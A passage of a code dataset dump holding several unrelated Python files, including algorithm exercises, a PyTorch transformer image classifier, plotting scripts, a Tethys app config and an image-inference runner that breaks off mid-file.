12, 0, 0].\n\n# Note:\n# You must do this in-place without making a copy of the array.\n# Minimize the total number of operations.\n\n\nclass Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n # sol 1:\n # runtime: 86ms\n i = 0\n for num in nums:\n if num!=0:\n nums[i] = num\n i += 1\n while i < len(nums):\n nums[i] = 0\n i += 1\n \n # sol 2\n # runtime: 58ms\n j = 0\n for i, num in enumerate(nums):\n if num!=0:\n nums[i], nums[j] = nums[j], nums[i]\n j += 1\n \n \n\n\n\n\n\n","sub_path":"source-code/Move Zeroes 283.py","file_name":"Move Zeroes 283.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"314814374","text":"from pprint import pprint\ncol, row = map(int, input().split())\n\nmatrix = []\nfor i in range(row):\n matrix.append(list(input()))\npprint(matrix, indent=2)\n\ndef countMines(i, k):\n if matrix[i][k] == '*':\n return '*'\n\n count = 0\n for r in range(i-1, i+2):\n for c in range(k-1, k+2):\n if r < 0 or c < 0 or r >= row or c >= col:\n continue\n if matrix[r][c] == '*':\n count += 1\n return count\n\nfor i in range(row):\n for k in range(col):\n print(countMines(i, k), end='')\n print()\n","sub_path":"Unit 23/u23_eval2.py","file_name":"u23_eval2.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"45069011","text":"import pandas as pd\n\ndf = pd.read_csv('answer_sheet.csv',index_col=0)\n\nout = \"output.txt\" #出力ファイルの初期化\nf = open(out,\"w\")\nf.write(\"\")\nf.close()\n\nd = df.shape #データフレームの行数、列数の取得\n\nfor var1 in range(0,d[1]): #質問項目1つめ\n for var2 in range(0,d[1]): #質問項目2つめ\n if var1 != var2:\n count0 = 0 #0→?の総和\n count0_0 = 0 #0-0\n count0_1 = 0 #0-1\n count1 = 0 #1→?総和\n count1_0 = 0 #1-0\n count1_1 = 0 #1-1\n for var3 in range(0,d[0]): #プレイヤーID\n if not (df.iloc[var3,var1] == \"X\" or df.iloc[var3,var2] == \"X\") or (df.iloc[var3,var1] == \"?\" or df.iloc[var3,var2] == \"?\"):\n if df.iloc[var3,var1] == \"0\" and df.iloc[var3,var2] != \"0\":\n count0 = count0 +1\n count0_0 = count0_0 +1\n elif df.iloc[var3,var1] == \"0\" and df.iloc[var3,var2] != \"1\":\n count0 = count0 +1\n count0_1 = count0_1 +1\n elif df.iloc[var3,var1] == \"1\" and df.iloc[var3,var2] != \"0\":\n count1 = count1 +1\n count1_0 = count1_0 +1\n else:\n count1 = count1 +1\n count1_1 = count1_1 +1\n count0_0 = count0_0/count0*100\n count0_1 = count0_1/count0*100\n count1_0 = count1_0/count1*100\n count1_1 = count1_1/count1*100\n if count0_0 > 85:\n f = open(out,\"a\")\n f.write(str(var1+1) + \"→\" + str(var2+1) + \",0→0:\" + str(count0) + \",\" + str(count0_0) + \"\\n\")\n f.close()\n elif count0_1 >85:\n f = open(out,\"a\")\n f.write(str(var1+1) + \"→\" + str(var2+1) + \",0→1:\" + str(count0) + \",\" + str(count0_1) + \"\\n\")\n f.close()\n elif count1_0 >85:\n f = open(out,\"a\")\n f.write(str(var1+1) + \"→\" + str(var2+1) + \",1→0:\" + str(count1) + \",\" + str(count1_0) + \"\\n\")\n f.close()\n elif count1_1 >85:\n f = open(out,\"a\")\n f.write(str(var1+1) + \"→\" + str(var2+1) + \",1→1:\" + str(count1) + \",\" + str(count1_1) + \"\\n\")\n f.close()","sub_path":"answer_cl.py","file_name":"answer_cl.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"443409347","text":"#Lembrando que o grafo não pode ter cíclo e deve ser direcionado\nn,m = map(int,input().split())\n\ngrafo = [[] for i in range(n)]\n\nvisitados = [-1] * n\nresp = []\n\nfor x in range(m):\n a,b = map(int,input().split())\n grafo[a-1].append(b)\n\ndef dfs(v):\n visitados[v-1] = 0\n\n for adj in grafo[v-1]:\n if visitados[adj-1] == -1:\n dfs(adj)\n\n resp.append(v)\n\ndef topological_sort():\n for i in range(n):\n if visitados[i] == -1:\n dfs(i)\n return resp[::-1]\n\nprint(topological_sort())\n","sub_path":"topological_sort.py","file_name":"topological_sort.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370808905","text":"##\nfrom ii_params import *\n\n## Params\ntrial = 50\n\n##\ngs_kw = dict(height_ratios=[20,2,1], wspace=0.1, hspace=0.1, left=.1, right=.975, top=.96, bottom=.02)\nfig,axs = pl.subplots(3, 1, num='Trial {}'.format(trial), figsize=(5,9), sharex=True, gridspec_kw=gs_kw); axs=axs.ravel()\n\ntinfo = trials[trials.idx==trial].squeeze()\n\nti2c = i2c[i2c.trial==trial]\nafi = ti2c.abs_frame_idx.values\n\ndfft = dff[afi.min():afi.max()]\nsigt = pf.Series(is_sig[afi.min():afi.max()])\ndfft.plot(ax=axs[0], color='k', binary_label=sigt)\n#axs[0].set_yticks([])\n#sigt.plot(ax=axs[0], color='k')\naxs[0].vlines(dff.index[afi], 0, axs[0].get_ylim()[1], linestyles='--', color='k')\naxs[1].vlines(dff.index[afi], 0, axs[1].get_ylim()[1], linestyles='--', color='k')\naxs[0].set_title(', '.join(['{}: {:0.1f}'.format(i,tinfo[i]) for i in ['side','choice','outcome','ratio']]))\n\n# plot ar events\nfor styl,ons in zip((puff_m,lick_m), (puff_onset,lick_onset)):\n o = ons[ons.trial==trial]\n o = [o[o.direction==i].frame.values for i in range(2)]\n for oi,m in zip(o,('<','>')):\n axs[2].scatter(dff.index[oi], np.zeros_like(oi), marker=m, **styl)\n axs[0].vlines(dff.index[oi], 0, axs[0].get_ylim()[1], linestyles='--', color=styl['color'], alpha=0.3)\n axs[1].vlines(dff.index[oi], 0, axs[0].get_ylim()[1], linestyles='--', color=styl['color'], alpha=0.3)\n# plot hall\no = hall_onset[hall_onset.trial==trial]\no = o.frame.values\naxs[2].scatter(dff.index[o], np.zeros_like(o), **hall_m)\naxs[2].set_yticks([])\naxs[2].set_ylim([-.5,.5])\npretty(ax=axs[0])\n\ntake_sl = slice(afi.min(), afi.max())\nrct = rollcor[take_sl]\nrct.index = dff.index[take_sl]\nrct.plot(ax=axs[1])\n#axs[1].set_ylabel('mean r')\naxs[1].set_xticks([])\naxs[1].set_yticks([])\npretty(ax=axs[1])\nticf(ax=axs[1], y=10)\naxs[1].set_ylim([rct.min(), rct.max()])\n##\n","sub_path":"analysis/c6/ii_trial.py","file_name":"ii_trial.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"98134931","text":"from tethys_sdk.base import TethysAppBase, url_map_maker\n\n\nclass Lfhazard(TethysAppBase):\n \"\"\"\n Tethys app class for Liquefaction Hazard Lookup.\n \"\"\"\n\n name = 'Liquefaction Hazard Parameter Lookup'\n index = 'lfhazard:home'\n icon = 'lfhazard/images/icon.gif'\n package = 'lfhazard'\n root_url = 'lfhazard'\n color = '#915F6D'\n description = ''\n tags = ''\n enable_feedback = False\n feedback_emails = []\n\n def url_maps(self):\n \"\"\"\n Add controllers\n \"\"\"\n urlmap = url_map_maker(self.root_url)\n\n return (\n urlmap(\n name='home',\n url=f'{self.root_url}/',\n controller='lfhazard.controllers.home'\n ),\n urlmap(\n name='getgeojson',\n url=f'{self.root_url}/getgeojson',\n controller='lfhazard.controllers.get_geojson'\n ),\n urlmap(\n name='querycsv',\n url=f'{self.root_url}/querycsv',\n controller='lfhazard.controllers.query_csv'\n ),\n )\n","sub_path":"tethysapp/lfhazard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"437190691","text":"\n\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\n\nBATCH_NORM_DECAY = 1 - 0.9 # pytorch batch norm `momentum = 1 - counterpart` of tensorflow\nBATCH_NORM_EPSILON = 1e-5\ntype = 0\n\ndef get_act(activation):\n \"\"\"Only supports ReLU and SiLU/Swish.\"\"\"\n assert activation in ['relu', 'silu']\n if activation == 'relu':\n return nn.ReLU()\n else:\n return nn.Hardswish() # TODO: pytorch's nn.Hardswish() v.s. tf.nn.swish\n\n\nclass BNReLU(nn.Module):\n \"\"\"\"\"\"\n\n def __init__(self, out_channels, activation='relu', nonlinearity=True, init_zero=False):\n super(BNReLU, self).__init__()\n\n self.norm = nn.BatchNorm2d(out_channels, momentum=BATCH_NORM_DECAY, eps=BATCH_NORM_EPSILON)\n if nonlinearity:\n self.act = get_act(activation)\n else:\n self.act = None\n\n if init_zero:\n nn.init.constant_(self.norm.weight, 0)\n else:\n nn.init.constant_(self.norm.weight, 1)\n\n def forward(self, input):\n out = self.norm(input)\n if self.act is not None:\n out = self.act(out)\n return out\n\n\nclass RelPosSelfAttention(nn.Module):\n \"\"\"Relative Position Self Attention\"\"\"\n\n def __init__(self, h, w, dim, relative=True, fold_heads=False):\n super(RelPosSelfAttention, self).__init__()\n self.relative = relative\n self.fold_heads = fold_heads\n self.rel_emb_w = nn.Parameter(torch.Tensor(2 * w - 1, dim))\n self.rel_emb_h = nn.Parameter(torch.Tensor(2 * h - 1, dim))\n\n nn.init.normal_(self.rel_emb_w, std=dim ** -0.5)\n nn.init.normal_(self.rel_emb_h, std=dim ** -0.5)\n\n def forward(self, q, k, v):\n \"\"\"2D self-attention with rel-pos. Add option to fold heads.\"\"\"\n bs, heads, h, w, dim = q.shape\n q = q * (dim ** -0.5) # scaled dot-product\n logits = torch.einsum('bnhwd,bnpqd->bnhwpq', q, k)\n if self.relative:\n logits += self.relative_logits(q)\n weights = torch.reshape(logits, [-1, heads, h, w, h * w])\n weights = F.softmax(weights, dim=-1)\n weights = torch.reshape(weights, [-1, heads, h, w, h, w])\n attn_out = torch.einsum('bnhwpq,bnpqd->bhwnd', weights, v)\n if self.fold_heads:\n attn_out = torch.reshape(attn_out, [-1, h, w, heads * dim])\n return attn_out\n\n def relative_logits(self, q):\n # Relative logits in width dimension.\n rel_logits_w = self.relative_logits_1d(q, self.rel_emb_w, transpose_mask=[0, 1, 2, 4, 3, 5])\n # Relative logits in height dimension\n rel_logits_h = self.relative_logits_1d(q.permute(0, 1, 3, 2, 4), self.rel_emb_h,\n transpose_mask=[0, 1, 4, 2, 5, 3])\n return rel_logits_h + rel_logits_w\n\n def relative_logits_1d(self, q, rel_k, transpose_mask):\n bs, heads, h, w, dim = q.shape\n rel_logits = torch.einsum('bhxyd,md->bhxym', q, rel_k)\n rel_logits = torch.reshape(rel_logits, [-1, heads * h, w, 2 * w - 1])\n rel_logits = self.rel_to_abs(rel_logits)\n rel_logits = torch.reshape(rel_logits, [-1, heads, h, w, w])\n rel_logits = torch.unsqueeze(rel_logits, dim=3)\n rel_logits = rel_logits.repeat(1, 1, 1, h, 1, 1)\n rel_logits = rel_logits.permute(*transpose_mask)\n return rel_logits\n\n def rel_to_abs(self, x):\n \"\"\"\n Converts relative indexing to absolute.\n Input: [bs, heads, length, 2*length - 1]\n Output: [bs, heads, length, length]\n \"\"\"\n bs, heads, length, _ = x.shape\n col_pad = torch.zeros((bs, heads, length, 1), dtype=x.dtype).cuda()\n x = torch.cat([x, col_pad], dim=3)\n flat_x = torch.reshape(x, [bs, heads, -1]).cuda()\n flat_pad = torch.zeros((bs, heads, length - 1), dtype=x.dtype).cuda()\n flat_x_padded = torch.cat([flat_x, flat_pad], dim=2)\n final_x = torch.reshape(\n flat_x_padded, [bs, heads, length + 1, 2 * length - 1])\n final_x = final_x[:, :, :length, length - 1:]\n return final_x\n\n\nclass AbsPosSelfAttention(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, W, H, dkh, absolute=True, fold_heads=False):\n super(AbsPosSelfAttention, self).__init__()\n self.absolute = absolute\n self.fold_heads = fold_heads\n\n self.emb_w = nn.Parameter(torch.Tensor(W, dkh))\n self.emb_h = nn.Parameter(torch.Tensor(H, dkh))\n nn.init.normal_(self.emb_w, dkh ** -0.5)\n nn.init.normal_(self.emb_h, dkh ** -0.5)\n\n def forward(self, q, k, v):\n bs, heads, h, w, dim = q.shape\n q = q * (dim ** -0.5) # scaled dot-product\n logits = torch.einsum('bnhwd,bnpqd->bnhwpq', q, k)\n abs_logits = self.absolute_logits(q)\n if self.absolute:\n logits += abs_logits\n weights = torch.reshape(logits, [-1, heads, h, w, h * w])\n weights = F.softmax(weights, dim=-1)\n weights = torch.reshape(weights, [-1, heads, h, w, h, w])\n attn_out = torch.einsum('bnhwpq,bnpqd->bhwnd', weights, v)\n if self.fold_heads:\n attn_out = torch.reshape(attn_out, [-1, h, w, heads * dim])\n return attn_out\n\n def absolute_logits(self, q):\n \"\"\"Compute absolute position enc logits.\"\"\"\n emb_h = self.emb_h[:, None, :]\n emb_w = self.emb_w[None, :, :]\n emb = emb_h + emb_w\n abs_logits = torch.einsum('bhxyd,pqd->bhxypq', q, emb)\n return abs_logits\n\n\nclass GroupPointWise(nn.Module):\n \"\"\"\"\"\"\n\n def __init__(self, in_channels, heads=4, proj_factor=1, target_dimension=None):\n super(GroupPointWise, self).__init__()\n if target_dimension is not None:\n proj_channels = target_dimension // proj_factor\n else:\n proj_channels = in_channels // proj_factor\n self.w = nn.Parameter(\n torch.Tensor(in_channels, heads, proj_channels // heads)\n )\n\n nn.init.normal_(self.w, std=0.01)\n\n def forward(self, input):\n # dim order: pytorch BCHW v.s. TensorFlow BHWC\n input = input.permute(0, 2, 3, 1).float()\n \"\"\"\n b: batch size\n h, w : imput height, width\n c: input channels\n n: num head\n p: proj_channel // heads\n \"\"\"\n out = torch.einsum('bhwc,cnp->bnhwp', input, self.w)\n return out\n\n\nclass MHSA(nn.Module):\n \"\"\"\n \"\"\"\n\n def __init__(self, in_channels, heads, curr_h, curr_w, pos_enc_type='relative', use_pos=True):\n super(MHSA, self).__init__()\n self.q_proj = GroupPointWise(in_channels, heads, proj_factor=1)\n self.k_proj = GroupPointWise(in_channels, heads, proj_factor=1)\n self.v_proj = GroupPointWise(in_channels, heads, proj_factor=1)\n\n assert pos_enc_type in ['relative', 'absolute']\n if pos_enc_type == 'relative':\n self.self_attention = RelPosSelfAttention(curr_h, curr_w, in_channels // heads, fold_heads=True)\n else:\n raise NotImplementedError\n\n def forward(self, input):\n q = self.q_proj(input)\n k = self.k_proj(input)\n v = self.v_proj(input)\n\n o = self.self_attention(q=q, k=k, v=v)\n return o\n\n\n\nclass GTBotBlock(nn.Module):\n\n\n def __init__(self, in_dimension, curr_h, curr_w, proj_factor=4, activation='relu', pos_enc_type='relative',\n stride=1, target_dimension=2048):\n super(GTBotBlock, self).__init__()\n if stride != 1 or in_dimension != target_dimension:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_dimension, target_dimension, kernel_size=1, stride=stride),\n BNReLU(target_dimension, activation=activation, nonlinearity=True),\n )\n else:\n self.shortcut = None\n\n bottleneck_dimension = target_dimension // proj_factor\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_dimension, bottleneck_dimension, kernel_size=1, stride=1),\n BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True)\n )\n\n self.mhsa = MHSA(in_channels=bottleneck_dimension, heads=4, curr_h=curr_h, curr_w=curr_w,\n pos_enc_type=pos_enc_type)\n conv2_list = []\n if stride != 1:\n assert stride == 2, stride\n conv2_list.append(nn.AvgPool2d(kernel_size=(2, 2), stride=(2, 2))) # TODO: 'same' in tf.pooling\n conv2_list.append(BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True))\n self.conv2 = nn.Sequential(*conv2_list)\n\n self.conv3 = nn.Sequential(\n nn.Conv2d(bottleneck_dimension, target_dimension, kernel_size=1, stride=1),\n BNReLU(target_dimension, nonlinearity=False, init_zero=True),\n )\n\n self.last_act = get_act(activation)\n\n\n def forward(self, x):\n if self.shortcut is not None:\n shortcut = self.shortcut(x)\n else:\n shortcut = x\n\n out = self.conv1(x)\n Q_h = Q_w = 4\n N, C, H, W = out.shape\n P_h, P_w = H // Q_h, W // Q_w\n \n if type == 1:\n out = out.reshape(N, C, P_h, Q_h, P_w, Q_w)\n out = out.permute(0, 2, 4, 1, 3, 5)\n out = out.reshape(N * P_h * P_w, C, Q_h, Q_w)\n out = self.mhsa(out)\n out = out.permute(0, 3, 1, 2) # back to pytorch dim order\n \n out = self.conv2(out)\n N1, C1, H1, W1 = out.shape\n if type == 1:\n out = out.reshape(N , P_h , P_w, C, int(Q_h/2), int(Q_w/2))\n out = out.permute(0, 3, 1, 4, 2, 5)\n out = out.reshape(N, C1, int(H1 * (N1 / N) ** 0.5), int(W1 * (N1 / N) ** 0.5))\n out = self.conv3(out)\n\n out += shortcut\n out = self.last_act(out)\n\n return out\n\n\n\nclass GTBotBlock2(nn.Module):\n\n def __init__(self, in_dimension, curr_h, curr_w, proj_factor=4, activation='relu', pos_enc_type='relative',\n stride=1, target_dimension=2048):\n super(GTBotBlock2, self).__init__()\n if stride != 1 or in_dimension != target_dimension:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_dimension, target_dimension, kernel_size=1, stride=stride),\n BNReLU(target_dimension, activation=activation, nonlinearity=True),\n )\n else:\n self.shortcut = None\n\n bottleneck_dimension = target_dimension // proj_factor\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_dimension, bottleneck_dimension, kernel_size=1, stride=1),\n BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True)\n )\n\n self.mhsa = MHSA(in_channels=bottleneck_dimension, heads=4, curr_h=curr_h, curr_w=curr_w,\n pos_enc_type=pos_enc_type)\n conv2_list = []\n if stride != 1:\n assert stride == 2, stride\n conv2_list.append(nn.AvgPool2d(kernel_size=(2, 2), stride=(2, 2))) # TODO: 'same' in tf.pooling\n conv2_list.append(BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True))\n self.conv2 = nn.Sequential(*conv2_list)\n\n self.conv3 = nn.Sequential(\n nn.Conv2d(bottleneck_dimension, target_dimension, kernel_size=1, stride=1),\n BNReLU(target_dimension, nonlinearity=False, init_zero=True),\n )\n\n self.last_act = get_act(activation)\n\n\n def forward(self, x):\n if self.shortcut is not None:\n shortcut = self.shortcut(x)\n else:\n shortcut = x\n\n\n out = self.conv1(x)\n\n Q_h = Q_w = 8\n N, C, H, W = out.shape\n P_h, P_w = H // Q_h, W // Q_w\n\n if type == 1:\n out = out.reshape(N, C, P_h, Q_h, P_w, Q_w)\n out = out.permute(0, 2, 4, 1, 3, 5)\n out = out.reshape(N * P_h * P_w, C, Q_h, Q_w)\n\n out = self.mhsa(out)\n out = out.permute(0, 3, 1, 2) # back to pytorch dim order\n out = self.conv2(out)\n\n N1, C1, H1, W1 = out.shape\n if type == 1:\n out = out.reshape(N , P_h , P_w, C, int(Q_h/2), int(Q_w/2))\n out = out.permute(0, 3, 1, 4, 2, 5)\n out = out.reshape(N, C1, int(H1 * (N1 / N) ** 0.5), int(W1 * (N1 / N) ** 0.5))\n\n out = self.conv3(out)\n out += shortcut\n out = self.last_act(out)\n\n return out\n\n\n\nclass BotBlock(nn.Module):\n\n def __init__(self, in_dimension, curr_h, curr_w, proj_factor=4, activation='relu', pos_enc_type='relative',\n stride=1, target_dimension=2048):\n super(BotBlock, self).__init__()\n if stride != 1 or in_dimension != target_dimension:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_dimension, target_dimension, kernel_size=1, stride=stride),\n BNReLU(target_dimension, activation=activation, nonlinearity=True),\n )\n else:\n self.shortcut = None\n\n bottleneck_dimension = target_dimension // proj_factor\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_dimension, bottleneck_dimension, kernel_size=1, stride=1),\n BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True)\n )\n\n self.mhsa = MHSA(in_channels=bottleneck_dimension, heads=4, curr_h=curr_h, curr_w=curr_w,\n pos_enc_type=pos_enc_type)\n conv2_list = []\n if stride != 1:\n assert stride == 2, stride\n conv2_list.append(nn.AvgPool2d(kernel_size=(2, 2), stride=(2, 2))) # TODO: 'same' in tf.pooling\n conv2_list.append(BNReLU(bottleneck_dimension, activation=activation, nonlinearity=True))\n self.conv2 = nn.Sequential(*conv2_list)\n\n self.conv3 = nn.Sequential(\n nn.Conv2d(bottleneck_dimension, target_dimension, kernel_size=1, stride=1),\n BNReLU(target_dimension, nonlinearity=False, init_zero=True),\n )\n\n self.last_act = get_act(activation)\n\n def forward(self, x):\n out = self.conv1(x)\n\n out = self.mhsa(out)\n out = out.permute(0, 3, 1, 2) # back to pytorch dim order\n\n out = self.conv2(out)\n out = self.conv3(out)\n\n if self.shortcut is not None:\n shortcut = self.shortcut(x)\n else:\n shortcut = x\n out += shortcut\n out = self.last_act(out)\n return out\n\n\nCARDINALITY = 32\nDEPTH = 4\nBASEWIDTH = 64\n\n\n\nclass AGGTNeckC(nn.Module):\n\n def __init__(self, in_channels, out_channels, stride):\n super().__init__()\n\n C = CARDINALITY #How many groups a feature map was splitted into\n\n D = int(DEPTH * out_channels / BASEWIDTH) #number of channels per group\n self.split_transforms = nn.Sequential(\n nn.Conv2d(in_channels, C * D, kernel_size=1, groups=C, bias=False),\n nn.BatchNorm2d(C * D),\n nn.ReLU(inplace=True),\n nn.Conv2d(C * D, C * D, kernel_size=3, stride=stride, groups=C, padding=1, bias=False),\n nn.BatchNorm2d(C * D),\n nn.ReLU(inplace=True),\n nn.Conv2d(C * D, out_channels * 4, kernel_size=1, bias=False),\n nn.BatchNorm2d(out_channels * 4),\n )\n\n self.shortcut = nn.Sequential()\n\n if stride != 1 or in_channels != out_channels * 4:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_channels, out_channels * 4, stride=stride, kernel_size=1, bias=False),\n nn.BatchNorm2d(out_channels * 4)\n )\n\n def forward(self, x):\n return F.relu(self.split_transforms(x) + self.shortcut(x))\n\nclass AGGT(nn.Module):\n\n def __init__(self, block, num_blocks, class_names=3):\n super().__init__()\n self.in_channels = 64\n\n self.conv1 = nn.Sequential(\n nn.Conv2d(3, 64, 3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True)\n )\n\n self.conv2 = self._make_layer(block, num_blocks[0], 64, 1)\n self.conv3 = self._make_layer(block, num_blocks[1], 128, 2)\n self.conv4 = self._make_layer(block, num_blocks[2], 256, 2)\n #self.downsample = self._make_downsample_layer()\n self.conv5 = self._make_gt_layer2(1024,2048)\n self.conv5_1_x = self._make_layer(block, num_blocks[3], 512, 2)\n\n\n planes=1024\n self.globalAvgPool = nn.AdaptiveAvgPool2d(1)\n self.fc1 = nn.Linear(in_features=planes * 4, out_features=round(planes / 2))\n self.relu = nn.ReLU(inplace=True)\n self.fc2 = nn.Linear(in_features=round(planes / 2), out_features= 64 )\n self.sigmoid = nn.Sigmoid()\n self.conv6 = nn.Sequential(\n nn.Conv2d(2048, 2048, kernel_size=1, stride=1,padding=1, bias=False),\n BNReLU(2048, activation='relu', nonlinearity=True)\n )\n\n self.avg = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * 4*2, 3)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n\n output1 = self.conv5(x)\n output2 = self.conv5_1_x(x)\n\n output = torch.cat([output1, output2], 1)\n\n out = self.globalAvgPool(output)\n out = out.view(out.size(0), -1)\n out = self.fc1(out)\n out = self.relu(out)\n out = self.fc2(out)\n out = self.sigmoid(out)\n array=out.cpu().detach().numpy()\n outchanel=torch.zeros(array.shape[0],2048,16,16)\n\n for i in range(array.shape[0]):\n asum=array\n median=np.median(asum)\n\n posi=np.where(asum>median)\n if(len(posi[0])!=32):\n n=32-len(posi[0])\n mid=np.where(asum == median)[0][0:n]\n if(len(mid)==1):\n mid=(mid,)\n posi=(np.append(posi[0],mid),)\n\n posinew=np.array([])\n for p in range(0,32):\n posinew = np.append(posinew, np.arange(posi[0][p]*64,(posi[0][p]+1)*64))\n\n outchanel[i] =( output[i, posinew, :, :])\n\n output=outchanel.cuda()\n\n output = self.conv6(output)\n\n\n x = self.avg(output)\n x = x.view(x.size(0), -1)\n\n x = self.fc(x)\n return x\n\n def _make_layer(self, block, num_block, out_channels, stride):\n\n strides = [stride] + [1] * (num_block - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_channels, out_channels, stride))\n self.in_channels = out_channels * 4\n\n return nn.Sequential(*layers)\n\n def _make_last_layer(self, block, out_channels, num_blocks, stride):\n\n W = H = 32\n dim_in = 1024\n dim_out = 2048\n\n stage5 = []\n for i in range(3):\n stage5.append(\n BotBlock(in_dimension=dim_in, curr_h=H, curr_w=W, stride=2 if i == 0 else 1, target_dimension=dim_out)\n )\n if i == 0:\n H = H // 2\n W = W // 2\n dim_in = dim_out\n\n return nn.Sequential(*stage5)\n\n def _make_gt_layer(self, ch_in, ch_out):\n\n W = H = 8\n dim_in = ch_in\n dim_out = ch_out\n\n stage = []\n for i in range(3):\n stage.append(\n GTBotBlock(in_dimension=dim_in, curr_h=H, curr_w=W, stride=2 if i == 0 else 1, target_dimension=dim_out)\n )\n dim_in = dim_out\n\n return nn.Sequential(*stage)\n\n def _make_gt_layer2(self, ch_in, ch_out):\n\n W = H = 8\n dim_in = ch_in\n dim_out = ch_out\n\n stage = []\n stage.append(\n GTBotBlock(in_dimension=dim_in, curr_h=4, curr_w=4, stride=2 if 0 == 0 else 1, target_dimension=dim_out)\n )\n dim_in = dim_out\n\n stage.append(\n GTBotBlock2(in_dimension=dim_in, curr_h=H, curr_w=W, stride=2 if 1 == 0 else 1, target_dimension=dim_out)\n )\n dim_in = dim_out\n\n stage.append(\n BotBlock(in_dimension=dim_in, curr_h=16, curr_w=16, stride=2 if 2 == 0 else 1, target_dimension=dim_out)\n )\n\n return nn.Sequential(*stage)\n\n\n\n\ndef AGGT50():\n\n return AGGT(AGGTNeckC, [3, 4, 6, 3])\n\n\n\n\n\n","sub_path":"models/AGMB-Transformer.py","file_name":"AGMB-Transformer.py","file_ext":"py","file_size_in_byte":20103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"628324497","text":"import cv2\nimport csv\nimport random\nimport os\n\nnew = \"./kind/\"\ncate = \"./kind/\"\n\ndef plot_one_box(x, img, color=None, label=None, line_thickness=None,rank=0): # Plots one bounding box on image img\n tl = 2#line_thickness or round(0.002 * max(img.shape[0:2])) + 1 # line thickness\n color = color or [random.randint(0, 255) for _ in range(3)]\n c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))\n cv2.rectangle(img, c1, c2, color, tl)\n if label:\n tf = max(tl - 1, 1) # font thickness\n t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]\n c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3\n cv2.rectangle(img, c1, c2, color, -1) # filled\n cv2.putText(img, label+\":\"+str(rank), (c1[0], c1[1] - 2), 0, tl / 4, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)\n\nfilename = \"./submit.csv\"\nf = open(filename)\nreader = csv.reader(f)\nreader = list(reader)[1:]\nprint(list(reader))\n\nprint('-----processing-------')\n\nfor name,x1,y1,x2,y2,x3,y3,rec in reader:\n\n if rec == \"1\":\n label = \"havestar\"\n else:\n label = \"nostar\"\n print(\"input :\",new+label+\"/\"+name+\".jpg\")\n img = cv2.imread(new+label+\"/\"+name+\".jpg\")\n if img is None:\n print(\"shape:\")\n continue\n x1,x2,x3 = int(float(x1)),int(float(x2)),int(float(x3))\n y1,y2,y3 = int(float(y1)),int(float(y2)),int(float(y3))\n a = [x1-10,y1-10,x1+10,y1+10]\n b = [x2-10,y2-10,x2+10,y2+10]\n c = [x3-10,y3-10,x3+10,y3+10]\n print(a,b,c)\n plot_one_box(a,img,color = (250,0,0),label=label,rank=1)\n plot_one_box(b,img,color = (255,0,0),label=label,rank=2)\n plot_one_box(c,img,color = (255,0,0),label=label,rank=3)\n print(\"output:\",cate+label+\"1/\"+name+\".jpg\")\n print(cv2.imwrite(cate+label+\"1/\"+name+\".jpg\",img))\n\n","sub_path":"vis_submit/plotsubmit.py","file_name":"plotsubmit.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"193886981","text":"#!/usr/bin/env python3\n\nimport aiohttp\nimport asyncio\nimport click\nimport json\nimport math\nimport os\nfrom tqdm.asyncio import tqdm as async_tqdm\nfrom tqdm import tqdm\n\nfrom palette_adapter import PaletteAdapter\n\nADAPTERS = {\n \"palette\": PaletteAdapter\n}\n\n# Batching required otherwise asyncio times out\nBATCH_SIZE = 1000\nMAX_CONNECTIONS = 32\n\n\n@click.command()\n@click.option(\"-h\", \"--inferrer-host\", type=str, required=True)\n@click.option(\"-a\", \"--adapter-name\", type=click.Choice(list(ADAPTERS.keys())), required=True)\n@click.option(\"-i\", \"--input-dir\", type=str, required=True)\n@click.option(\"-o\", \"--output-file\", type=str, required=True)\n@click.option(\"-n\", type=int, default=0)\ndef run_inference(inferrer_host, adapter_name, input_dir, output_file, n):\n adapter = ADAPTERS[adapter_name](inferrer_host)\n image_urls = [f\"file://{os.path.abspath(file.path)}\" for file in os.scandir(input_dir)]\n if n != 0:\n image_urls = image_urls[0:n]\n results = []\n\n async def run():\n connector = 